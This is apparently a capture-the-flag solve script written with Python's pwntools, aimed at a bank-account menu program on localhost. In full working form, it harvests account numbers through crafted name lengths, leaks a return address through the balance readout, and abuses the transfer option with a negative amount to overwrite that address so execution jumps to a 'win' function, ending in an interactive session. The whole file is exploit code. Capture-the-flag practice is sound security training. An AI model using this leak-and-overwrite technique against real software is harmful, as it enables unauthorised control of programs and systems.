solve (1043B)
1#!/usr/bin/env python3 2 3from pwn import * 4import sys 5 6args = sys.argv[1:] 7if args == []: 8 args = ["nc", "localhost", "1024"] 9io = process(args) 10 11nums = list() 12for i in range(9): 13 io.readuntil(b"choice:") 14 io.send(b"1") 15 io.sendline(b"A"*(82-i)) 16 io.sendline(b"123") 17 io.readuntil(b"Account Number: ") 18 print(line := io.readline()) 19 nums.append(int(line)) 20 print(io.readline()) 21 print(io.readline()) 22 print() 23 24io.readuntil(b"choice:") 25io.send(b"1") 26io.sendline(b"B" * 79) 27io.sendline(b"123") 28io.readuntil(b"Account Number: ") 29nums.append(int(io.readline())) 30 31assert(0 not in nums) # unlucky 32 33io.readuntil(b"choice:") 34io.sendline(b"2") 35io.sendline(b"0") 36io.readuntil(b"Balance: ") 37ret = int(io.readline()) 38 39ret_off = 0x1157 40win_off = 0x1270 41assert(ret & 0xfff == ret_off & 0xfff) 42 43io.readuntil(b"choice:") 44io.sendline(b"3") 45io.sendline(b"0") # src 46io.sendline(str(nums[0]).encode()) # dst 47io.sendline(str(-(win_off - ret_off)).encode()) 48io.readuntil(b"Transfer successful.") 49 50io.sendline(b"4") 51 52io.interactive()